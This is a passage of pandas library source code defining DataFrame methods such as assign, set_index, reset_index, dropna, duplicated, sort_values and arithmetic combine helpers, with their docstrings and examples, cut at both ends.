Assign new columns to a DataFrame, returning a new object
(a copy) with all the original columns in addition to the new ones.
Parameters
----------
kwargs : keyword, value pairs
keywords are the column names. If the values are
callable, they are computed on the DataFrame and
assigned to the new columns. The callable must not
change input DataFrame (though pandas doesn't check it).
If the values are not callable, (e.g. a Series, scalar, or array),
they are simply assigned.
Returns
-------
df : DataFrame
A new DataFrame with the new columns in addition to
all the existing columns.
Notes
-----
For python 3.6 and above, the columns are inserted in the order of
\*\*kwargs. For python 3.5 and earlier, since \*\*kwargs is unordered,
the columns are inserted in alphabetical order at the end of your
DataFrame. Assigning multiple columns within the same ``assign``
is possible, but you cannot reference other columns created within
the same ``assign`` call.
Examples
--------
>>> df = pd.DataFrame({'A': range(1, 11), 'B': np.random.randn(10)})
Where the value is a callable, evaluated on `df`:
>>> df.assign(ln_A = lambda x: np.log(x.A))
A B ln_A
0 1 0.426905 0.000000
1 2 -0.780949 0.693147
2 3 -0.418711 1.098612
3 4 -0.269708 1.386294
4 5 -0.274002 1.609438
5 6 -0.500792 1.791759
6 7 1.649697 1.945910
7 8 -1.495604 2.079442
8 9 0.549296 2.197225
9 10 -0.758542 2.302585
Where the value already exists and is inserted:
>>> newcol = np.log(df['A'])
>>> df.assign(ln_A=newcol)
A B ln_A
0 1 0.426905 0.000000
1 2 -0.780949 0.693147
2 3 -0.418711 1.098612
3 4 -0.269708 1.386294
4 5 -0.274002 1.609438
5 6 -0.500792 1.791759
6 7 1.649697 1.945910
7 8 -1.495604 2.079442
8 9 0.549296 2.197225
9 10 -0.758542 2.302585
"""
data = self.copy()
# do all calculations first...
results = OrderedDict()
for k, v in kwargs.items():
results[k] = com._apply_if_callable(v, data)
# preserve order for 3.6 and later, but sort by key for 3.5 and earlier
if PY36:
results = results.items()
else:
results = sorted(results.items())
# ... and then assign
for k, v in results:
data[k] = v
return data
def _sanitize_column(self, key, value, broadcast=True):
"""
Ensures new columns (which go into the BlockManager as new blocks) are
always copied and converted into an array.
Parameters
----------
key : object
value : scalar, Series, or array-like
broadcast : bool, default True
If ``key`` matches multiple duplicate column names in the
DataFrame, this parameter indicates whether ``value`` should be
tiled so that the returned array contains a (duplicated) column for
each occurrence of the key. If False, ``value`` will not be tiled.
Returns
-------
sanitized_column : numpy-array
"""
def reindexer(value):
# reindex if necessary
if value.index.equals(self.index) or not len(self.index):
value = value._values.copy()
else:
# GH 4107
try:
value = value.reindex(self.index)._values
except Exception as e:
# duplicate axis
if not value.index.is_unique:
raise e
# other
raise TypeError('incompatible index of inserted column '
'with frame index')
return value
if isinstance(value, Series):
value = reindexer(value)
elif isinstance(value, DataFrame):
# align right-hand-side columns if self.columns
# is multi-index and self[key] is a sub-frame
if isinstance(self.columns, MultiIndex) and key in self.columns:
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, Series, np.ndarray, Index)):
cols = maybe_droplevels(self.columns[loc], key)
if len(cols) and not cols.equals(value.columns):
value = value.reindex(cols, axis=1)
# now align rows
value = reindexer(value).T
elif isinstance(value, Categorical):
value = value.copy()
elif isinstance(value, Index) or is_sequence(value):
from pandas.core.series import _sanitize_index
# turn me into an ndarray
value = _sanitize_index(value, self.index, copy=False)
if not isinstance(value, (np.ndarray, Index)):
if isinstance(value, list) and len(value) > 0:
value = maybe_convert_platform(value)
else:
value = com._asarray_tuplesafe(value)
elif value.ndim == 2:
value = value.copy().T
elif isinstance(value, Index):
value = value.copy(deep=True)
else:
value = value.copy()
# possibly infer to datetimelike
if is_object_dtype(value.dtype):
value = maybe_infer_to_datetimelike(value)
else:
# upcast the scalar
value = cast_scalar_to_array(len(self.index), value)
value = maybe_cast_to_datetime(value, value.dtype)
# return internal types directly
if is_extension_type(value):
return value
# broadcast across multiple columns if necessary
if broadcast and key in self.columns and value.ndim == 1:
if (not self.columns.is_unique or
isinstance(self.columns, MultiIndex)):
existing_piece = self[key]
if isinstance(existing_piece, DataFrame):
value = np.tile(value, (len(existing_piece.columns), 1))
return np.atleast_2d(np.asarray(value))
@property
def _series(self):
result = {}
for idx, item in enumerate(self.columns):
result[item] = Series(self._data.iget(idx), index=self.index,
name=item)
return result
def lookup(self, row_labels, col_labels):
"""Label-based "fancy indexing" function for DataFrame.
Given equal-length arrays of row and column labels, return an
array of the values corresponding to each (row, col) pair.
Parameters
----------
row_labels : sequence
The row labels to use for lookup
col_labels : sequence
The column labels to use for lookup
Notes
-----
Akin to::
result = []
for row, col in zip(row_labels, col_labels):
result.append(df.get_value(row, col))
Examples
--------
values : ndarray
The found values
"""
n = len(row_labels)
if n != len(col_labels):
raise ValueError('Row labels must have same size as column labels')
thresh = 1000
if not self._is_mixed_type or n > thresh:
values = self.values
ridx = self.index.get_indexer(row_labels)
cidx = self.columns.get_indexer(col_labels)
if (ridx == -1).any():
raise KeyError('One or more row labels was not found')
if (cidx == -1).any():
raise KeyError('One or more column labels was not found')
flat_index = ridx * len(self.columns) + cidx
result = values.flat[flat_index]
else:
result = np.empty(n, dtype='O')
for i, (r, c) in enumerate(zip(row_labels, col_labels)):
result[i] = self._get_value(r, c)
if is_object_dtype(result):
result = lib.maybe_convert_objects(result)
return result
# ----------------------------------------------------------------------
# Reindexing and alignment
def _reindex_axes(self, axes, level, limit, tolerance, method, fill_value,
copy):
frame = self
columns = axes['columns']
if columns is not None:
frame = frame._reindex_columns(columns, method, copy, level,
fill_value, limit, tolerance)
index = axes['index']
if index is not None:
frame = frame._reindex_index(index, method, copy, level,
fill_value, limit, tolerance)
return frame
def _reindex_index(self, new_index, method, copy, level, fill_value=np.nan,
limit=None, tolerance=None):
new_index, indexer = self.index.reindex(new_index, method=method,
level=level, limit=limit,
tolerance=tolerance)
return self._reindex_with_indexers({0: [new_index, indexer]},
copy=copy, fill_value=fill_value,
allow_dups=False)
def _reindex_columns(self, new_columns, method, copy, level,
fill_value=np.nan, limit=None, tolerance=None):
new_columns, indexer = self.columns.reindex(new_columns, method=method,
level=level, limit=limit,
tolerance=tolerance)
return self._reindex_with_indexers({1: [new_columns, indexer]},
copy=copy, fill_value=fill_value,
allow_dups=False)
def _reindex_multi(self, axes, copy, fill_value):
""" we are guaranteed non-Nones in the axes! """
new_index, row_indexer = self.index.reindex(axes['index'])
new_columns, col_indexer = self.columns.reindex(axes['columns'])
if row_indexer is not None and col_indexer is not None:
indexer = row_indexer, col_indexer
new_values = algorithms.take_2d_multi(self.values, indexer,
fill_value=fill_value)
return self._constructor(new_values, index=new_index,
columns=new_columns)
else:
return self._reindex_with_indexers({0: [new_index, row_indexer],
1: [new_columns, col_indexer]},
copy=copy,
fill_value=fill_value)
@Appender(_shared_docs['align'] % _shared_doc_kwargs)
def align(self, other, join='outer', axis=None, level=None, copy=True,
fill_value=None, method=None, limit=None, fill_axis=0,
broadcast_axis=None):
return super(DataFrame, self).align(other, join=join, axis=axis,
level=level, copy=copy,
fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis,
broadcast_axis=broadcast_axis)
@Appender(_shared_docs['reindex'] % _shared_doc_kwargs)
@rewrite_axis_style_signature('labels', [('method', None),
('copy', True),
('level', None),
('fill_value', np.nan),
('limit', None),
('tolerance', None)])
def reindex(self, *args, **kwargs):
axes = validate_axis_style_args(self, args, kwargs, 'labels',
'reindex')
kwargs.update(axes)
# Pop these, since the values are in `kwargs` under different names
kwargs.pop('axis', None)
kwargs.pop('labels', None)
return super(DataFrame, self).reindex(**kwargs)
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
return super(DataFrame,
self).reindex_axis(labels=labels, axis=axis,
method=method, level=level, copy=copy,
limit=limit, fill_value=fill_value)
@rewrite_axis_style_signature('mapper', [('copy', True),
('inplace', False),
('level', None)])
def rename(self, *args, **kwargs):
"""Alter axes labels.
Function / dict values must be unique (1-to-1). Labels not contained in
a dict / Series will be left as-is. Extra labels listed don't throw an
error.
See the :ref:`user guide <basics.rename>` for more.
Parameters
----------
mapper, index, columns : dict-like or function, optional
dict-like or functions transformations to apply to
that axis' values. Use either ``mapper`` and ``axis`` to
specify the axis to target with ``mapper``, or ``index`` and
``columns``.
axis : int or str, optional
Axis to target with ``mapper``. Can be either the axis name
('index', 'columns') or number (0, 1). The default is 'index'.
copy : boolean, default True
Also copy underlying data
inplace : boolean, default False
Whether to return a new %(klass)s. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
Returns
-------
renamed : DataFrame
See Also
--------
pandas.DataFrame.rename_axis
Examples
--------
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(index=str, columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
>>> df.rename(index=str, columns={"A": "a", "C": "c"})
a B
0 1 4
1 2 5
2 3 6
Using axis-style parameters
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
"""
axes = validate_axis_style_args(self, args, kwargs, 'mapper', 'rename')
kwargs.update(axes)
# Pop these, since the values are in `kwargs` under different names
kwargs.pop('axis', None)
kwargs.pop('mapper', None)
return super(DataFrame, self).rename(**kwargs)
@Appender(_shared_docs['fillna'] % _shared_doc_kwargs)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None, **kwargs):
return super(DataFrame,
self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast, **kwargs)
@Appender(_shared_docs['shift'] % _shared_doc_kwargs)
def shift(self, periods=1, freq=None, axis=0):
return super(DataFrame, self).shift(periods=periods, freq=freq,
axis=axis)
def set_index(self, keys, drop=True, append=False, inplace=False,
verify_integrity=False):
"""
Set the DataFrame index (row labels) using one or more existing
columns. By default yields a new object.
Parameters
----------
keys : column label or list of column labels / arrays
drop : boolean, default True
Delete columns to be used as the new index
append : boolean, default False
Whether to append columns to existing index
inplace : boolean, default False
Modify the DataFrame in place (do not create a new object)
verify_integrity : boolean, default False
Check the new index for duplicates. Otherwise defer the check until
necessary. Setting to False will improve the performance of this
method
Examples
--------
>>> df = pd.DataFrame({'month': [1, 4, 7, 10],
... 'year': [2012, 2014, 2013, 2014],
... 'sale':[55, 40, 84, 31]})
month sale year
0 1 55 2012
1 4 40 2014
2 7 84 2013
3 10 31 2014
Set the index to become the 'month' column:
>>> df.set_index('month')
sale year
month
1 55 2012
4 40 2014
7 84 2013
10 31 2014
Create a multi-index using columns 'year' and 'month':
>>> df.set_index(['year', 'month'])
sale
year month
2012 1 55
2014 4 40
2013 7 84
2014 10 31
Create a multi-index using a set of values and a column:
>>> df.set_index([[1, 2, 3, 4], 'year'])
month sale
year
1 2012 1 55
2 2014 4 40
3 2013 7 84
4 2014 10 31
Returns
-------
dataframe : DataFrame
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if not isinstance(keys, list):
keys = [keys]
if inplace:
frame = self
else:
frame = self.copy()
arrays = []
names = []
if append:
names = [x for x in self.index.names]
if isinstance(self.index, MultiIndex):
for i in range(self.index.nlevels):
arrays.append(self.index._get_level_values(i))
else:
arrays.append(self.index)
to_remove = []
for col in keys:
if isinstance(col, MultiIndex):
# append all but the last column so we don't have to modify
# the end of this loop
for n in range(col.nlevels - 1):
arrays.append(col._get_level_values(n))
level = col._get_level_values(col.nlevels - 1)
names.extend(col.names)
elif isinstance(col, Series):
level = col._values
names.append(col.name)
elif isinstance(col, Index):
level = col
names.append(col.name)
elif isinstance(col, (list, np.ndarray, Index)):
level = col
names.append(None)
else:
level = frame[col]._values
names.append(col)
if drop:
to_remove.append(col)
arrays.append(level)
index = _ensure_index_from_sequences(arrays, names)
if verify_integrity and not index.is_unique:
duplicates = index.get_duplicates()
raise ValueError('Index has duplicate keys: %s' % duplicates)
for c in to_remove:
del frame[c]
# clear up memory usage
index._cleanup()
frame.index = index
if not inplace:
return frame
def reset_index(self, level=None, drop=False, inplace=False, col_level=0,
col_fill=''):
"""
For DataFrame with multi-level index, return new DataFrame with
labeling information in the columns under the index names, defaulting
to 'level_0', 'level_1', etc. if any are None. For a standard index,
the index name will be used (if set), otherwise a default 'index' or
'level_0' (if 'index' is already taken) will be used.
Parameters
----------
level : int, str, tuple, or list, default None
Only remove the given levels from the index. Removes all levels by
default
drop : boolean, default False
Do not try to insert index into dataframe columns. This resets
the index to the default integer index.
inplace : boolean, default False
Modify the DataFrame in place (do not create a new object)
col_level : int or str, default 0
If the columns have multiple levels, determines which level the
labels are inserted into. By default it is inserted into the first
level.
col_fill : object, default ''
If the columns have multiple levels, determines how the other
levels are named. If None then the index name is repeated.
Returns
-------
resetted : DataFrame
Examples
--------
>>> df = pd.DataFrame([('bird', 389.0),
... ('bird', 24.0),
... ('mammal', 80.5),
... ('mammal', np.nan)],
... index=['falcon', 'parrot', 'lion', 'monkey'],
... columns=('class', 'max_speed'))
>>> df
class max_speed
falcon bird 389.0
parrot bird 24.0
lion mammal 80.5
monkey mammal NaN
When we reset the index, the old index is added as a column, and a
new sequential index is used:
>>> df.reset_index()
index class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
We can use the `drop` parameter to avoid the old index being added as
a column:
>>> df.reset_index(drop=True)
class max_speed
0 bird 389.0
1 bird 24.0
2 mammal 80.5
3 mammal NaN
You can also use `reset_index` with `MultiIndex`.
>>> index = pd.MultiIndex.from_tuples([('bird', 'falcon'),
... ('bird', 'parrot'),
... ('mammal', 'lion'),
... ('mammal', 'monkey')],
... names=['class', 'name'])
>>> columns = pd.MultiIndex.from_tuples([('speed', 'max'),
... ('species', 'type')])
>>> df = pd.DataFrame([(389.0, 'fly'),
... ( 24.0, 'fly'),
... ( 80.5, 'run'),
... (np.nan, 'jump')],
... index=index,
... columns=columns)
>>> df
speed species
max type
class name
bird falcon 389.0 fly
parrot 24.0 fly
mammal lion 80.5 run
monkey NaN jump
If the index has multiple levels, we can reset a subset of them:
>>> df.reset_index(level='class')
class speed species
max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we are not dropping the index, by default, it is placed in the top
level. We can place it in another level:
>>> df.reset_index(level='class', col_level=1)
speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
When the index is inserted under another level, we can specify under
which one with the parameter `col_fill`:
>>> df.reset_index(level='class', col_level=1, col_fill='species')
species speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we specify a nonexistent level for `col_fill`, it is created:
>>> df.reset_index(level='class', col_level=1, col_fill='genus')
genus speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if inplace:
new_obj = self
else:
new_obj = self.copy()
def _maybe_casted_values(index, labels=None):
if isinstance(index, PeriodIndex):
values = index.astype(object).values
elif isinstance(index, DatetimeIndex) and index.tz is not None:
values = index
else:
values = index.values
if values.dtype == np.object_:
values = lib.maybe_convert_objects(values)
# if we have the labels, extract the values with a mask
if labels is not None:
mask = labels == -1
# we can have situations where the whole mask is -1,
# meaning there is nothing found in labels, so make all nan's
if mask.all():
values = np.empty(len(mask))
values.fill(np.nan)
else:
values = values.take(labels)
if mask.any():
values, changed = maybe_upcast_putmask(
values, mask, np.nan)
return values
new_index = _default_index(len(new_obj))
if level is not None:
if not isinstance(level, (tuple, list)):
level = [level]
level = [self.index._get_level_number(lev) for lev in level]
if isinstance(self.index, MultiIndex):
if len(level) < self.index.nlevels:
new_index = self.index.droplevel(level)
if not drop:
if isinstance(self.index, MultiIndex):
names = [n if n is not None else ('level_%d' % i)
for (i, n) in enumerate(self.index.names)]
to_insert = lzip(self.index.levels, self.index.labels)
else:
default = 'index' if 'index' not in self else 'level_0'
names = ([default] if self.index.name is None
else [self.index.name])
to_insert = ((self.index, None),)
multi_col = isinstance(self.columns, MultiIndex)
for i, (lev, lab) in reversed(list(enumerate(to_insert))):
if not (level is None or i in level):
continue
name = names[i]
if multi_col:
col_name = (list(name) if isinstance(name, tuple)
else [name])
if col_fill is None:
if len(col_name) not in (1, self.columns.nlevels):
raise ValueError("col_fill=None is incompatible "
"with incomplete column name "
"{}".format(name))
col_fill = col_name[0]
lev_num = self.columns._get_level_number(col_level)
name_lst = [col_fill] * lev_num + col_name
missing = self.columns.nlevels - len(name_lst)
name_lst += [col_fill] * missing
name = tuple(name_lst)
# to ndarray and maybe infer different dtype
level_values = _maybe_casted_values(lev, lab)
new_obj.insert(0, name, level_values)
new_obj.index = new_index
if not inplace:
return new_obj
# ----------------------------------------------------------------------
# Reindex-based selection methods
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return super(DataFrame, self).isna()
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isnull(self):
return super(DataFrame, self).isnull()
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return super(DataFrame, self).notna()
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notnull(self):
return super(DataFrame, self).notnull()
def dropna(self, axis=0, how='any', thresh=None, subset=None,
inplace=False):
"""
Return object with labels on given axis omitted where alternately any
or all of the data are missing
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, or tuple/list thereof
Pass tuple or list to drop on multiple axes
how : {'any', 'all'}
* any : if any NA values are present, drop that label
* all : if all values are NA, drop that label
thresh : int, default None
int value : require that many non-NA values
subset : array-like
Labels along other axis to consider, e.g. if you are dropping rows
these would be a list of columns to include
inplace : boolean, default False
If True, do operation inplace and return None.
Returns
-------
dropped : DataFrame
Examples
--------
>>> df = pd.DataFrame([[np.nan, 2, np.nan, 0], [3, 4, np.nan, 1],
... [np.nan, np.nan, np.nan, 5]],
... columns=list('ABCD'))
>>> df
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 NaN NaN NaN 5
Drop the columns where all elements are nan:
>>> df.dropna(axis=1, how='all')
A B D
0 NaN 2.0 0
1 3.0 4.0 1
2 NaN NaN 5
Drop the columns where any of the elements is nan
>>> df.dropna(axis=1, how='any')
D
0 0
1 1
2 5
Drop the rows where all of the elements are nan
(there is no row to drop, so df stays the same):
>>> df.dropna(axis=0, how='all')
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 NaN NaN NaN 5
Keep only the rows with at least 2 non-na values:
>>> df.dropna(thresh=2)
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if isinstance(axis, (tuple, list)):
result = self
for ax in axis:
result = result.dropna(how=how, thresh=thresh, subset=subset,
axis=ax)
else:
axis = self._get_axis_number(axis)
agg_axis = 1 - axis
agg_obj = self
if subset is not None:
ax = self._get_axis(agg_axis)
indices = ax.get_indexer_for(subset)
check = indices == -1
if check.any():
raise KeyError(list(np.compress(check, subset)))
agg_obj = self.take(indices, axis=agg_axis)
count = agg_obj.count(axis=agg_axis)
if thresh is not None:
mask = count >= thresh
elif how == 'any':
mask = count == len(agg_obj._get_axis(agg_axis))
elif how == 'all':
mask = count > 0
else:
if how is not None:
raise ValueError('invalid how option: %s' % how)
else:
raise TypeError('must specify how or thresh')
result = self._take(mask.nonzero()[0], axis=axis, convert=False)
if inplace:
self._update_inplace(result)
else:
return result
def drop_duplicates(self, subset=None, keep='first', inplace=False):
"""
Return DataFrame with duplicate rows removed, optionally only
considering certain columns
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns
keep : {'first', 'last', False}, default 'first'
- ``first`` : Drop duplicates except for the first occurrence.
- ``last`` : Drop duplicates except for the last occurrence.
- False : Drop all duplicates.
inplace : boolean, default False
Whether to drop duplicates in place or to return a copy
Returns
-------
deduplicated : DataFrame
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
duplicated = self.duplicated(subset, keep=keep)
if inplace:
inds, = (-duplicated).nonzero()
new_data = self._data.take(inds)
self._update_inplace(new_data)
else:
return self[-duplicated]
def duplicated(self, subset=None, keep='first'):
"""
Return boolean Series denoting duplicate rows, optionally only
considering certain columns
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns
keep : {'first', 'last', False}, default 'first'
- ``first`` : Mark duplicates as ``True`` except for the
first occurrence.
- ``last`` : Mark duplicates as ``True`` except for the
last occurrence.
- False : Mark all duplicates as ``True``.
Returns
-------
duplicated : Series
"""
from pandas.core.sorting import get_group_index
from pandas._libs.hashtable import duplicated_int64, _SIZE_HINT_LIMIT
def f(vals):
labels, shape = algorithms.factorize(
vals, size_hint=min(len(self), _SIZE_HINT_LIMIT))
return labels.astype('i8', copy=False), len(shape)
if subset is None:
subset = self.columns
elif (not np.iterable(subset) or
isinstance(subset, compat.string_types) or
isinstance(subset, tuple) and subset in self.columns):
subset = subset,
vals = (col.values for name, col in self.iteritems()
if name in subset)
labels, shape = map(list, zip(*map(f, vals)))
ids = get_group_index(labels, shape, sort=False, xnull=False)
return Series(duplicated_int64(ids, keep), index=self.index)
# ----------------------------------------------------------------------
# Sorting
@Appender(_shared_docs['sort_values'] % _shared_doc_kwargs)
def sort_values(self, by, axis=0, ascending=True, inplace=False,
kind='quicksort', na_position='last'):
inplace = validate_bool_kwarg(inplace, 'inplace')
axis = self._get_axis_number(axis)
other_axis = 0 if axis == 1 else 1
if not isinstance(by, list):
by = [by]
if is_sequence(ascending) and len(by) != len(ascending):
raise ValueError('Length of ascending (%d) != length of by (%d)' %
(len(ascending), len(by)))
if len(by) > 1:
from pandas.core.sorting import lexsort_indexer
keys = []
for x in by:
k = self.xs(x, axis=other_axis).values
if k.ndim == 2:
raise ValueError('Cannot sort by duplicate column %s' %
str(x))
keys.append(k)
indexer = lexsort_indexer(keys, orders=ascending,
na_position=na_position)
indexer = _ensure_platform_int(indexer)
else:
from pandas.core.sorting import nargsort
by = by[0]
k = self.xs(by, axis=other_axis).values
if k.ndim == 2:
# try to be helpful
if isinstance(self.columns, MultiIndex):
raise ValueError('Cannot sort by column %s in a '
'multi-index you need to explicitly '
'provide all the levels' % str(by))
raise ValueError('Cannot sort by duplicate column %s' %
str(by))
if isinstance(ascending, (tuple, list)):
ascending = ascending[0]
indexer = nargsort(k, kind=kind, ascending=ascending,
na_position=na_position)
new_data = self._data.take(indexer,
axis=self._get_block_manager_axis(axis),
verify=False)
if inplace:
return self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
@Appender(_shared_docs['sort_index'] % _shared_doc_kwargs)
def sort_index(self, axis=0, level=None, ascending=True, inplace=False,
kind='quicksort', na_position='last', sort_remaining=True,
by=None):
# TODO: this can be combined with Series.sort_index impl as
# almost identical
inplace = validate_bool_kwarg(inplace, 'inplace')
# 10726
if by is not None:
warnings.warn("by argument to sort_index is deprecated, "
"please use .sort_values(by=...)",
FutureWarning, stacklevel=2)
if level is not None:
raise ValueError("unable to simultaneously sort by and level")
return self.sort_values(by, axis=axis, ascending=ascending,
inplace=inplace)
axis = self._get_axis_number(axis)
labels = self._get_axis(axis)
if level:
new_axis, indexer = labels.sortlevel(level, ascending=ascending,
sort_remaining=sort_remaining)
elif isinstance(labels, MultiIndex):
from pandas.core.sorting import lexsort_indexer
# make sure that the axis is lexsorted to start
# if not we need to reconstruct to get the correct indexer
labels = labels._sort_levels_monotonic()
indexer = lexsort_indexer(labels._get_labels_for_sorting(),
orders=ascending,
na_position=na_position)
else:
from pandas.core.sorting import nargsort
# Check monotonic-ness before sort an index
# GH11080
if ((ascending and labels.is_monotonic_increasing) or
(not ascending and labels.is_monotonic_decreasing)):
if inplace:
return
else:
return self.copy()
indexer = nargsort(labels, kind=kind, ascending=ascending,
na_position=na_position)
baxis = self._get_block_manager_axis(axis)
new_data = self._data.take(indexer,
axis=baxis,
verify=False)
# reconstruct axis if needed
new_data.axes[baxis] = new_data.axes[baxis]._sort_levels_monotonic()
if inplace:
return self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
def sortlevel(self, level=0, axis=0, ascending=True, inplace=False,
sort_remaining=True):
"""
DEPRECATED: use :meth:`DataFrame.sort_index`
Sort multilevel index by chosen axis and primary level. Data will be
lexicographically sorted by the chosen level followed by the other
levels (in order)
Parameters
----------
level : int
axis : {0 or 'index', 1 or 'columns'}, default 0
ascending : boolean, default True
inplace : boolean, default False
Sort the DataFrame without creating a new instance
sort_remaining : boolean, default True
Sort by the other levels too.
Returns
-------
sorted : DataFrame
See Also
--------
DataFrame.sort_index(level=...)
"""
warnings.warn("sortlevel is deprecated, use sort_index(level= ...)",
FutureWarning, stacklevel=2)
return self.sort_index(level=level, axis=axis, ascending=ascending,
inplace=inplace, sort_remaining=sort_remaining)
def nlargest(self, n, columns, keep='first'):
"""Get the rows of a DataFrame sorted by the `n` largest
values of `columns`.
Parameters
----------
n : int
Number of items to retrieve
columns : list or str
Column name or names to order by
keep : {'first', 'last'}, default 'first'
Where there are duplicate values:
- ``first`` : take the first occurrence.
- ``last`` : take the last occurrence.
Returns
-------
DataFrame
Examples
--------
>>> df = pd.DataFrame({'a': [1, 10, 8, 11, -1],
... 'b': list('abdce'),
... 'c': [1.0, 2.0, np.nan, 3.0, 4.0]})
>>> df.nlargest(3, 'a')
a b c
3 11 c 3
1 10 b 2
2 8 d NaN
"""
return algorithms.SelectNFrame(self,
n=n,
keep=keep,
columns=columns).nlargest()
def nsmallest(self, n, columns, keep='first'):
"""Get the rows of a DataFrame sorted by the `n` smallest
values of `columns`.
Parameters
----------
n : int
Number of items to retrieve
columns : list or str
Column name or names to order by
keep : {'first', 'last'}, default 'first'
Where there are duplicate values:
- ``first`` : take the first occurrence.
- ``last`` : take the last occurrence.
Returns
-------
DataFrame
Examples
--------
>>> df = pd.DataFrame({'a': [1, 10, 8, 11, -1],
... 'b': list('abdce'),
... 'c': [1.0, 2.0, np.nan, 3.0, 4.0]})
>>> df.nsmallest(3, 'a')
a b c
4 -1 e 4
0 1 a 1
2 8 d NaN
"""
return algorithms.SelectNFrame(self,
n=n,
keep=keep,
columns=columns).nsmallest()
def swaplevel(self, i=-2, j=-1, axis=0):
"""
Swap levels i and j in a MultiIndex on a particular axis
Parameters
----------
i, j : int, string (can be mixed)
Level of index to be swapped. Can pass level name as string.
Returns
-------
swapped : type of caller (new object)
.. versionchanged:: 0.18.1
The indexes ``i`` and ``j`` are now optional, and default to
the two innermost levels of the index.
"""
result = self.copy()
axis = self._get_axis_number(axis)
if axis == 0:
result.index = result.index.swaplevel(i, j)
else:
result.columns = result.columns.swaplevel(i, j)
return result
def reorder_levels(self, order, axis=0):
"""
Rearrange index levels using input order.
May not drop or duplicate levels
Parameters
----------
order : list of int or list of str
List representing new level order. Reference level by number
(position) or by key (label).
axis : int
Where to reorder levels.
Returns
-------
type of caller (new object)
"""
axis = self._get_axis_number(axis)
if not isinstance(self._get_axis(axis),
MultiIndex): # pragma: no cover
raise TypeError('Can only reorder levels on a hierarchical axis.')
result = self.copy()
if axis == 0:
result.index = result.index.reorder_levels(order)
else:
result.columns = result.columns.reorder_levels(order)
return result
# ----------------------------------------------------------------------
# Arithmetic / combination related
def _combine_frame(self, other, func, fill_value=None, level=None,
try_cast=True):
this, other = self.align(other, join='outer', level=level, copy=False)
new_index, new_columns = this.index, this.columns
def _arith_op(left, right):
if fill_value is not None:
left_mask = isna(left)
right_mask = isna(right)
left = left.copy()
right = right.copy()
# one but not both
mask = left_mask ^ right_mask
left[left_mask & mask] = fill_value
right[right_mask & mask] = fill_value
return func(left, right)
if this._is_mixed_type or other._is_mixed_type:
# unique
if this.columns.is_unique:
def f(col):
r = _arith_op(this[col].values, other[col].values)
return self._constructor_sliced(r, index=new_index,
dtype=r.dtype)
result = {col: f(col) for col in this}
# non-unique
else:
def f(i):
r = _arith_op(this.iloc[:, i].values,
other.iloc[:, i].values)
return self._constructor_sliced(r, index=new_index,
dtype=r.dtype)
result = {i: f(i) for i, col in enumerate(this.columns)}
result = self._constructor(result, index=new_index, copy=False)
result.columns = new_columns
return result
else:
result = _arith_op(this.values, other.values)
return self._constructor(result, index=new_index, columns=new_columns,
copy=False)
def _combine_series(self, other, func, fill_value=None, axis=None,
level=None, try_cast=True):
if axis is not None:
axis = self._get_axis_name(axis)
if axis == 'index':
return self._combine_match_index(other, func, level=level,
fill_value=fill_value,
try_cast=try_cast)
else:
return self._combine_match_columns(other, func, level=level,
fill_value=fill_value,
try_cast=try_cast)
return self._combine_series_infer(other, func, level=level,
fill_value=fill_value,
try_cast=try_cast)
def _combine_series_infer(self, other, func, level=None,
fill_value=None, try_cast=True):
if len(other) == 0:
return self * np.nan
if len(self) == 0:
# Ambiguous case, use _series so works with DataFrame
return self._constructor(data=self._series, index=self.index,
columns=self.columns)
return self._combine_match_columns(other, func, level=level,
fill_value=fill_value,
try_cast=try_cast)
def _combine_match_index(self, other, func, level=None,
fill_value=None, try_cast=True):
left, right = self.align(other, join='outer', axis=0, level=level,
copy=False)
if fill_value is not None:
raise NotImplementedError("fill_value %r not supported." %
fill_value)
return self._constructor(func(left.values.T, right.values).T,
index=left.index, columns=self.columns,
copy=False)
def _combine_match_columns(self, other, func, level=None,
fill_value=None, try_cast=True):
left, right = self.align(other, join='outer', axis=1, level=level,
copy=False)
if fill_value is not None:
raise NotImplementedError("fill_value %r not supported" %
fill_value)
